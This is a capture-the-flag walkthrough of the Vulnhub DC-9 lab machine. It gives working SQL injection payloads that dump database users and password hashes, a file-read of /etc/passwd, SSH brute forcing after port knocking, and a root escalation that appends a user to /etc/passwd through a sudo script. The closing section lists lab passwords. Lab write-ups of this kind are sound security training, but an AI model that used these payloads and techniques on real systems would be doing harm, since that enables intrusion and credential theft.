# Vulnhub-DC 9 ## NMAP ```bash nmap -sC -sV 192.168.1.7 Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-16 09:31 PKT Nmap scan report for 192.168.1.7 Host is up (0.00021s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp filtered ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA) | 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA) |_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Example.com - Staff Details - Welcome MAC Address: 08:00:27:1B:8F:38 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## PORT 80 (HTTP) Going to `Display All Records` we can see information of users We can a login page , lets' try to do some basic sqli stuff I tried `admin ' or 1=1 #` , `admin' or 1=1 -- ` , but both failed Going over to `search.php` we can see that it searches for a name so let's supply the name `mary` since information for that user exists Here let's perform a query `mary' and 1=1 # ` to see if it still returns us information of mary It does , so here we can actually sqli but first we need to identify how many columns are there to do that we are going to ultize `order by ` which will sort by value of the number of column of provide , we will keep increasing the number we get no repsonse so, `mary' order by 1 #` I kept getting result till till 6 columns but after that I get no response Which means we have 6 columns so we can now perform sql injection `mary' union select version(),user(),database(),4,5,6 #` This machine is using MariaDB, user for the database client is dbuser and the database name is Staff , now we need to extract table name ,then the columns and the exfiltrate the data We can only perform a query to give us all the names for database ``` mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata # ``` So there two databases but right now let's just focus on `Staff` ``` mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() # ``` We have two tables , `StaffDetails` and `Users` so let's see column names for Users table ``` mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' # ``` We have the column names , we are intersted in username and password so let's just extract the data And we got the user name password hash , this could have been done with sqlmap easilty by just intercepting the request from `search.php` and saving it to a file and running it against sqlmap Let's visit crackstation As soon as we log in we'll get an error I tried the parameter `file` and got the contents of `/etc/passwd` So I copied the results in a file and grab the users only Now remeber that we had 2 databases `Staff` and `users` , let's use sqlmap to dump data from users database I have already saved the usernames ,let's just grab the password and start brute forcing aginst SSH But ssh is filtered so we are going to first see if we can find a port knocking configuration or not Now can perform port-knocking to open ssh port We found 2 passwords with brute forcing After logging in with `janitor` we can find more passwords Let's add those passwords and again try brute forcing Switching to user `fredf` we can that can run the file test as sudo It's a binary , let's try to execute it and see what happens Wierd it says test.py which is a python file which reads and appends so we need to find that python file And we found it So going through the source code , it's going to take 2 arguments as file , it's going to read the contents from first file store it in variable then it's going to append the contents in the file we specify we could exploit this by first adding a root user in a file then reading the contents from there and appending it to `/etc/passwd` file Now let's see if this actually worked or not This has added a user so we can switch to this user and become root admin:transorbital1 ``` chandlerb:UrAG0D! janitor: Ilovepeepee joeyt: Passw0rd fredf: B4-Tru3-001 ``` mary' union select 1,2,3,4,5,6 # mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() # mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' # mary' union select group_concat(Username),group_concat(Password),3,4,5,6 from 'Users' # mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #